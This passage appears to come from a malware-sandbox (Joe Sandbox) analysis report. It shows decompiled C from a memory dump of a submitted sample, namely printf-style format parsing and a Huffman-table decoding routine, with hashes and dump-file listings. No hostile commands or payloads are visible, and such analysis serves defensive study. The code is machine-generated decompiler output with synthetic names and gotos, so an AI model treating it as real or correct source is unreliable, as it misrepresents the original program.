				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0102539B(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E0101EC4A(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E01023C30(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E0102569B(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E01023C30(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E0102557D(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E01023C30(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E01025133(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E01025310(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E01024E99(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E0102527D(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E010252F1(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E01024CDC(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0102509B(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x01024969
0x01024971
0x01024978
0x0102497d
0x0102497f
0x01024983
0x01024986
0x0102498a
0x0102498b
0x0102498e
0x010249fb
0x010249fe
0x01024a4d
0x01024a4d
0x01024a50
0x010249bc
0x010249be
0x010249c3
0x010249c5
0x01024a6b
0x01024a6e
0x01024bb4
0x01024bb6
0x01024bc5
0x01024bc5
0x01024a74
0x01024a79
0x01024a7c
0x01024a7f
0x01024a83
0x01024a89
0x01024a8a
0x01024a8c
0x01024ab6
0x01024ab6
0x01024aba
0x01024abd
0x01024ac7
0x01024ac9
0x01024acc
0x01024ace
0x01024ad4
0x01024ad4
0x01024ad6
0x01024ad6
0x01024ad9
0x01024ae7
0x01024ae7
0x01024ae9
0x01024aeb
0x01024aec
0x01024aee
0x01024af4
0x01024af6
0x01024af7
0x01024afc
0x01024aff
0x01024b0d
0x01024b0d
0x01024b0f
0x01024b0f
0x01024b1a
0x01024b1c
0x01024b21
0x01024b21
0x01024b24
0x01024b2a
0x01024b2c
0x01024b2f
0x01024b3f
0x01024b44
0x01024b44
0x01024b59
0x01024b5e
0x01024b61
0x01024b66
0x01024b69
0x01024b6b
0x01024b6d
0x01024b70
0x01024b73
0x01024b80
0x01024b85
0x01024b85
0x01024b73
0x01024b8c
0x01024b91
0x01024b94
0x01024b99
0x01024b9c
0x01024b9e
0x01024bab
0x01024bb0
0x01024b9e
0x00000000
0x01024bb3
0x01024b03
0x01024b04
0x01024b07
0x00000000
0x00000000
0x01024b09
0x00000000
0x01024b09
0x01024af0
0x01024af2
0x00000000
0x00000000
0x00000000
0x01024af2
0x01024add
0x01024ade
0x01024ae1
0x00000000
0x00000000
0x01024ae3
0x00000000
0x01024ae3
0x00000000
0x01024ad0
0x01024ac1
0x01024ac2
0x01024ac5
0x00000000
0x00000000
0x00000000
0x01024ac5
0x01024a90
0x01024a93
0x01024a95
0x01024aa0
0x01024aa2
0x01024aaa
0x01024aac
0x01024aae
0x00000000
0x00000000
0x01024ab0
0x01024ab4
0x01024ab4
0x00000000
0x01024ab4
0x01024aa4
0x01024a99
0x01024a99
0x01024a9a
0x00000000
0x01024a9a
0x01024a97
0x00000000
0x01024a97
0x010249cb
0x00000000
0x010249cb
0x01024a57
0x01024a57
0x01024a5a
0x01024a2c
0x01024a2c
0x01024a2d
0x01024a2f
0x01024a31
0x00000000
0x01024a31
0x01024a5c
0x01024a5f
0x00000000
0x00000000
0x01024a65
0x010249d4
0x010249d4
0x00000000
0x010249d4
0x01024a00
0x01024a43
0x00000000
0x01024a43
0x01024a02
0x01024a05
0x01024a38
0x01024a3a
0x00000000
0x01024a3a
0x01024a07
0x01024a0a
0x01024a28
0x01024a28
0x01024a28
0x01024a28
0x00000000
0x01024a28
0x01024a0c
0x01024a0f
0x01024a21
0x00000000
0x01024a21
0x01024a11
0x01024a14
0x00000000
0x00000000
0x01024a18
0x00000000
0x01024a18
0x01024990
0x00000000
0x00000000
0x01024996
0x01024998
0x010249d8
0x010249d8
0x010249db
0x010249f4
0x00000000
0x010249f4
0x010249dd
0x010249dd
0x010249e0
0x00000000
0x00000000
0x010249e3
0x010249e6
0x00000000
0x00000000
0x010249e8
0x010249eb
0x00000000
0x010249eb
0x0102499a
0x010249d2
0x00000000
0x010249d2
0x0102499e
0x00000000
0x00000000
0x010249a7
0x00000000
0x00000000
0x010249ac
0x00000000
0x00000000
0x010249b1
0x00000000
0x00000000
0x010249ba
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9f64f25684dfd1b088199a6b12d0a2dd5dc1bc29d909a638cc050f94f90d2d
Instruction ID: 73d52485a70abf54304660af9f38e2aa0add695cbc40b56ae1d4823972e606e6
Opcode Fuzzy Hash: ae9f64f25684dfd1b088199a6b12d0a2dd5dc1bc29d909a638cc050f94f90d2d
Instruction Fuzzy Hash: AA61BC31B0073957EE789A2C8C94BFE37D8EB55604F000A9AEAC3DF2C0D6919942C35D

Uniqueness

Uniqueness Score: -1.00%

Function 01013D6D, Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E01013D6D(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E0100A7FB(_t168) >> 0x0000000c & 0x000000ff;
							E0100A7E4(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E0100A7FB(_t168) >> 0x0000000c & 0x000000ff;
							E0100A7E4(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E01013076();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E0100A800(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E0100A7FB(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E0100A7FB(_t139) >> 0xd) + 3;
													_push(3);
												}
												E0100A7E4(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E0100A7FB(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E0100A7FB(_t139) >> 0xd) + 3;
												_push(3);
											}
											E0100A7E4(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E010147FB(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E01013076();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E01013076();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E01013076();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E01013076();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E010147FB(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

0x01013d7c
0x01013d7e
0x01013d88
0x01013d8f
0x01013d93
0x01013daf
0x01013db0
0x01013db0
0x01013db3
0x01013dc1
0x01013dc4
0x01013dc9
0x01013dcc
0x01013e05
0x00000000
0x01013e05
0x01013ddc
0x01013ddf
0x01013de4
0x01013de6
0x01013def
0x01013def
0x01013df2
0x01013df2
0x01013df3
0x01013df6
0x00000000
0x00000000
0x01013df8
0x01013dfd
0x01013dfe
0x01013e00
0x00000000
0x00000000
0x00000000
0x01013e00
0x01013e02
0x00000000
0x01013e02
0x01013de8
0x01013e09
0x01013e09
0x01013e0a
0x01013e0a
0x01013e1a
0x01013e1c
0x01013e24
0x01013e25
0x01013e26
0x01013e2a
0x01013e2f
0x01013e2f
0x01013e31
0x01013e31
0x01013e35
0x01013e53
0x01013e55
0x01013e5c
0x01013e62
0x01013e68
0x01013e6c
0x01013e99
0x01013e9a
0x01013e9b
0x01013e9f
0x01013ea1
0x01013ebc
0x01013ebf
0x01013ecb
0x01013ecd
0x01013ed1
0x01013ed6
0x01013ee2
0x01013ee4
0x01013ee6
0x01013ee8
0x01013ee8
0x01013eea
0x01013ef2
0x01013ef2
0x01013ef5
0x01013f01
0x01013f03
0x01013f06
0x01013f50
0x01013f6d
0x01013f6d
0x01013f70
0x01013f52
0x01013f5c
0x01013f5f
0x01013f5f
0x01013f74
0x01013f79
0x01013f79
0x01013f7a
0x01013f80
0x00000000
0x00000000
0x01013f82
0x01013f87
0x01013f88
0x01013f8a
0x00000000
0x00000000
0x01013f8c
0x01013f8c
0x00000000
0x01013f8c
0x00000000
0x01013f79
0x01013f08
0x01013f0b
0x01013f28
0x01013f28
0x01013f2b
0x01013f0d
0x01013f17
0x01013f1a
0x01013f1a
0x01013f2f
0x01013f34
0x01013f36
0x01013fb3
0x01013fb3
0x0101401a
0x0101401c
0x00000000
0x01013f38
0x01013f38
0x01013f38
0x01013f39
0x01013f3f
0x00000000
0x00000000
0x01013f45
0x01013f49
0x01013f4a
0x01013f4c
0x00000000
0x00000000
0x00000000
0x01013f4e
0x00000000
0x01013f38
0x01013f36
0x01013ef7
0x01013efb
0x00000000
0x01013efb
0x01013ea6
0x01013ea9
0x01013ea9
0x01013eab
0x00000000
0x00000000
0x01013ead
0x01013eae
0x01013eb1
0x01013eb4
0x00000000
0x00000000
0x00000000
0x01013eb6
0x01013eb8
0x00000000
0x01013eb8
0x01013e70
0x01013e73
0x01013e7d
0x01013e85
0x01013e8a
0x01013e8d
0x00000000
0x01013e8d
0x01013e40
0x01013e42
0x00000000
0x00000000
0x01013e46
0x01013e4b
0x01013e4d
0x00000000
0x00000000
0x00000000
0x01013f90
0x01013f90
0x01013f90
0x01013f9c
0x01013f9c
0x01013fa3
0x01013fa7
0x01013fb7
0x01013fb7
0x01013fc2
0x01013fc7
0x01013fc8
0x01013fcb
0x01013fd0
0x01013fda
0x01013fe2
0x01013fe3
0x01013fe8
0x01013ff2
0x01013ffa
0x01013ffb
0x01014000
0x01014008
0x01014010
0x01014013
0x01014018
0x00000000
0x01014018
0x01013fab
0x01013fb1
0x00000000
0x00000000
0x00000000
0x01013fb1
0x01013d9e
0x01013da0
0x00000000
0x00000000
0x01013da2
0x01013da7
0x01013da9
0x00000000
0x00000000
0x00000000
0x01013da9
0x00000000

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction ID: aebc4e0897f8a84ad0e30e55187b5f8903ad5cd1fe2d310c30423acb25c208b9
Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: C67126707043468FEB26DE28C8D0BED77E5BB90324F04496DE9C78F2CADA7895898751

Uniqueness

Uniqueness Score: -1.00%

Function 0102473A, Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E0102473A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E01025328(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E01023C04(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E01025608(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E01023C04(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E010254D6(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E01023C04(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E01025133(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E01025310(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E01024D3F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0102527D(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E010252F1(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E01024C79(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0102500B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
